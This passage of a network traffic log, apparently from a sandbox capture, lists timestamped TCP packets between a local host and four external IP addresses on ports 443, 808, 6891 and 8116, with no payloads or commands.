Oct 28, 2021 05:27:16.926301003 CEST	49877	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:16.926321983 CEST	49877	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:16.932462931 CEST	49877	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:16.932476997 CEST	443	49877	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:17.022427082 CEST	808	49878	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:17.022572994 CEST	49878	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:17.023232937 CEST	49878	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:17.046173096 CEST	49879	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:17.183301926 CEST	808	49878	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:17.183583021 CEST	808	49878	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:17.183645964 CEST	49878	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:17.184417963 CEST	49878	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:17.215209007 CEST	808	49879	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:17.215306044 CEST	49879	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:17.215945005 CEST	49879	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:17.301142931 CEST	49878	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:17.301265955 CEST	49878	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:17.344593048 CEST	808	49878	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:17.384949923 CEST	808	49879	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:17.385086060 CEST	808	49879	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:17.385155916 CEST	49879	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:17.385786057 CEST	49879	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:17.390300989 CEST	49879	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:17.390455961 CEST	49879	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:17.461381912 CEST	808	49878	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:17.461405993 CEST	808	49878	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:17.461421013 CEST	808	49878	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:17.555197954 CEST	808	49879	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:17.559345961 CEST	808	49879	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:17.559437037 CEST	808	49879	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:17.559463978 CEST	808	49879	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:17.559509993 CEST	808	49879	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:17.849098921 CEST	808	49878	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:17.849128962 CEST	808	49878	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:17.849168062 CEST	49878	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:17.849195004 CEST	49878	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:17.851516962 CEST	49878	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:17.947051048 CEST	808	49879	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:17.947082043 CEST	808	49879	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:17.947623014 CEST	49879	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:17.954149961 CEST	49879	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:17.969463110 CEST	49880	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:18.011760950 CEST	808	49878	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:18.062772036 CEST	49881	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:18.124691963 CEST	808	49879	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:18.135355949 CEST	6891	49880	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:18.135545969 CEST	49880	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:18.137011051 CEST	49880	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:18.228885889 CEST	6891	49881	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:18.229015112 CEST	49881	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:18.230353117 CEST	49881	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:18.302818060 CEST	6891	49880	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:18.302988052 CEST	6891	49880	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:18.303102016 CEST	49880	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:18.304459095 CEST	49880	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:18.309644938 CEST	49880	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:18.309901953 CEST	49880	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:18.396251917 CEST	6891	49881	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:18.396333933 CEST	6891	49881	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:18.396466970 CEST	49881	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:18.397068024 CEST	49881	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:18.412890911 CEST	49881	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:18.412985086 CEST	49881	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:18.475564957 CEST	6891	49880	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:18.475681067 CEST	6891	49880	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:18.578866005 CEST	6891	49881	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:18.578886986 CEST	6891	49881	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:18.852866888 CEST	6891	49880	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:18.852901936 CEST	6891	49880	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:18.852950096 CEST	49880	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:18.852988005 CEST	49880	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:18.856193066 CEST	49880	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:18.966289997 CEST	6891	49881	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:18.966320992 CEST	6891	49881	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:18.966417074 CEST	49881	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:18.966449976 CEST	49881	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:18.974242926 CEST	49881	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:18.975440025 CEST	49882	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:19.022125006 CEST	6891	49880	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:19.026470900 CEST	8116	49882	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:19.026966095 CEST	49882	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:19.028652906 CEST	49882	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:19.079545021 CEST	8116	49882	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:19.079919100 CEST	8116	49882	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:19.080003977 CEST	49882	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:19.080656052 CEST	49882	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:19.084543943 CEST	49882	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:19.084662914 CEST	49882	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:19.093359947 CEST	49883	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:19.135431051 CEST	8116	49882	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:19.135445118 CEST	8116	49882	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:19.140294075 CEST	6891	49881	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:19.160475016 CEST	8116	49883	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:19.160872936 CEST	49883	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:19.161369085 CEST	49883	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:19.208384991 CEST	8116	49883	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:19.208519936 CEST	8116	49883	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:19.208601952 CEST	49883	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:19.209228039 CEST	49883	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:19.213044882 CEST	49883	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:19.213062048 CEST	49883	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:19.260490894 CEST	8116	49883	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:19.260793924 CEST	8116	49883	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:19.301124096 CEST	8116	49883	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:19.319032907 CEST	8116	49882	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:19.319056034 CEST	8116	49882	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:19.319133997 CEST	49882	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:19.322156906 CEST	49882	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:19.372946978 CEST	8116	49882	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:19.430773020 CEST	8116	49883	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:19.430794001 CEST	8116	49883	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:19.430876970 CEST	49883	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:19.432183981 CEST	49883	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:19.436892033 CEST	49883	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:19.454484940 CEST	49884	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:19.454525948 CEST	443	49884	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:19.454622030 CEST	49884	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:19.455102921 CEST	49884	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:19.455120087 CEST	443	49884	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:19.484066963 CEST	8116	49883	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:19.547049046 CEST	49885	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:19.547108889 CEST	443	49885	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:19.547224045 CEST	49885	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:19.547717094 CEST	49885	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:19.547734022 CEST	443	49885	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:19.977612019 CEST	443	49884	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:19.977761984 CEST	49884	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:19.982609987 CEST	49884	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:19.982624054 CEST	443	49884	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:19.986394882 CEST	49884	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:19.986406088 CEST	443	49884	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:19.986536980 CEST	49884	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:19.986546040 CEST	443	49884	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:20.068020105 CEST	443	49885	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:20.068207026 CEST	49885	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:20.197921038 CEST	49885	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:20.197947979 CEST	443	49885	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:20.202821970 CEST	49885	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:20.202851057 CEST	443	49885	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:20.202984095 CEST	49885	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:20.202994108 CEST	443	49885	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:20.701008081 CEST	443	49884	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:20.701100111 CEST	443	49884	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:20.701118946 CEST	49884	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:20.701149940 CEST	49884	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:20.707416058 CEST	49884	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:20.707438946 CEST	443	49884	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:20.908461094 CEST	443	49885	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:20.908535004 CEST	443	49885	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:20.908632040 CEST	49885	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:20.908660889 CEST	49885	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:21.139722109 CEST	49885	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:21.139770985 CEST	443	49885	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:21.253570080 CEST	49886	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:21.313575983 CEST	49887	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:21.411571980 CEST	808	49886	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:21.411698103 CEST	49886	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:21.413120031 CEST	49886	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:21.474065065 CEST	808	49887	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:21.474463940 CEST	49887	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:21.476274967 CEST	49887	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:21.571079969 CEST	808	49886	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:21.571176052 CEST	808	49886	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:21.571253061 CEST	49886	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:21.571830988 CEST	49886	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:21.576248884 CEST	49886	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:21.576630116 CEST	49886	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:21.636569023 CEST	808	49887	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:21.636720896 CEST	808	49887	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:21.636802912 CEST	49887	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:21.637319088 CEST	49887	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:21.641446114 CEST	49887	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:21.641552925 CEST	49887	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:21.729783058 CEST	808	49886	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:21.734292984 CEST	808	49886	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:21.734478951 CEST	808	49886	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:21.734545946 CEST	808	49886	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:21.734563112 CEST	808	49886	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:21.797615051 CEST	808	49887	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:21.801820040 CEST	808	49887	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:21.801860094 CEST	808	49887	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:21.801876068 CEST	808	49887	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:21.801892042 CEST	808	49887	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:22.111129045 CEST	808	49886	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:22.111161947 CEST	808	49886	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:22.111257076 CEST	49886	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:22.118279934 CEST	49886	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:22.179687977 CEST	808	49887	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:22.179712057 CEST	808	49887	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:22.179853916 CEST	49887	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:22.182684898 CEST	49887	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:22.235017061 CEST	49888	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:22.276266098 CEST	808	49886	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:22.302350044 CEST	49889	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:22.342997074 CEST	808	49887	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:22.401067972 CEST	6891	49888	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:22.401253939 CEST	49888	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:22.402245045 CEST	49888	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:22.468384027 CEST	6891	49889	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:22.469244003 CEST	49889	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:22.470026970 CEST	49889	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:22.568166971 CEST	6891	49888	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:22.568192959 CEST	6891	49888	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:22.568304062 CEST	49888	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:22.568862915 CEST	49888	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:22.572820902 CEST	49888	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:22.572935104 CEST	49888	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:22.635931015 CEST	6891	49889	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:22.635965109 CEST	6891	49889	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:22.636113882 CEST	49889	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:22.636936903 CEST	49889	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:22.640892029 CEST	49889	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:22.641017914 CEST	49889	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:22.738837957 CEST	6891	49888	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:22.738864899 CEST	6891	49888	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:22.775175095 CEST	6891	49888	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:22.806905985 CEST	6891	49889	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:22.806931019 CEST	6891	49889	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:23.116276026 CEST	6891	49888	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:23.116306067 CEST	6891	49888	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:23.116488934 CEST	49888	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:23.124500036 CEST	49888	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:23.190197945 CEST	6891	49889	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:23.190224886 CEST	6891	49889	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:23.190310001 CEST	49889	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:23.192500114 CEST	49889	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:23.234417915 CEST	49890	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:23.288923025 CEST	8116	49890	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:23.289122105 CEST	49890	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:23.289844990 CEST	49890	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:23.290417910 CEST	6891	49888	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:23.316416979 CEST	49891	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:23.342741013 CEST	8116	49890	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:23.343054056 CEST	8116	49890	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:23.343131065 CEST	49890	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:23.343755007 CEST	49890	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:23.352832079 CEST	49890	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:23.352966070 CEST	49890	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:23.358522892 CEST	6891	49889	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:23.365364075 CEST	8116	49891	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:23.365555048 CEST	49891	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:23.366130114 CEST	49891	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:23.405900955 CEST	8116	49890	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:23.414840937 CEST	8116	49891	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:23.414942980 CEST	8116	49891	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:23.415031910 CEST	49891	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:23.415671110 CEST	49891	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:23.420808077 CEST	49891	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:23.420970917 CEST	49891	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:23.469759941 CEST	8116	49891	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:23.470333099 CEST	8116	49891	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:23.592601061 CEST	8116	49890	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:23.592624903 CEST	8116	49890	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:23.592737913 CEST	49890	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:23.600558996 CEST	49890	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:23.653557062 CEST	8116	49890	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:23.660584927 CEST	8116	49891	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:23.660608053 CEST	8116	49891	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:23.660763979 CEST	49891	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:23.664047956 CEST	49891	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:23.712764978 CEST	8116	49891	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:23.719818115 CEST	49892	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:23.719877958 CEST	443	49892	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:23.719988108 CEST	49892	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:23.720915079 CEST	49892	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:23.720936060 CEST	443	49892	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:23.780528069 CEST	49893	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:23.780600071 CEST	443	49893	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:23.780756950 CEST	49893	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:23.781526089 CEST	49893	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:23.781555891 CEST	443	49893	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:24.247205019 CEST	443	49892	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:24.247344017 CEST	49892	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:24.248526096 CEST	49892	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:24.248543978 CEST	443	49892	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:24.255126953 CEST	49892	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:24.255148888 CEST	443	49892	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:24.255356073 CEST	49892	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:24.255373955 CEST	443	49892	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:24.304169893 CEST	443	49893	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:24.308322906 CEST	49893	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:24.310106039 CEST	49893	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:24.310127020 CEST	443	49893	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:24.316056013 CEST	49893	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:24.316075087 CEST	443	49893	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:24.316242933 CEST	49893	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:24.316255093 CEST	443	49893	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:24.971709967 CEST	443	49892	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:24.971793890 CEST	443	49892	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:24.971890926 CEST	49892	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:24.971959114 CEST	49892	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:24.979685068 CEST	49892	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:24.979727983 CEST	443	49892	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:25.025801897 CEST	443	49893	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:25.025871038 CEST	443	49893	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:25.025960922 CEST	49893	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:25.025993109 CEST	49893	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:25.029722929 CEST	49893	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:25.029755116 CEST	443	49893	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:25.142682076 CEST	49894	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:25.146837950 CEST	49895	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:25.304918051 CEST	808	49895	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:25.305179119 CEST	49895	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:25.305917025 CEST	49895	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:25.313429117 CEST	808	49894	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:25.313611031 CEST	49894	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:25.314274073 CEST	49894	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:25.463649035 CEST	808	49895	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:25.463840961 CEST	808	49895	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:25.463912010 CEST	49895	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:25.464874983 CEST	49895	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:25.469126940 CEST	49895	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:25.469279051 CEST	49895	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:25.483077049 CEST	808	49894	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:25.483275890 CEST	808	49894	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:25.483377934 CEST	49894	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:25.484200954 CEST	49894	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:25.509860992 CEST	49894	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:25.510003090 CEST	49894	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:25.622580051 CEST	808	49895	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:25.626943111 CEST	808	49895	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:25.626962900 CEST	808	49895	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:25.626971006 CEST	808	49895	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:25.627002001 CEST	808	49895	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:25.627042055 CEST	808	49895	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:25.652950048 CEST	808	49894	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:25.678714037 CEST	808	49894	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:25.678735018 CEST	808	49894	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:25.678742886 CEST	808	49894	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:26.015022039 CEST	808	49895	143.244.140.214	192.168.2.3
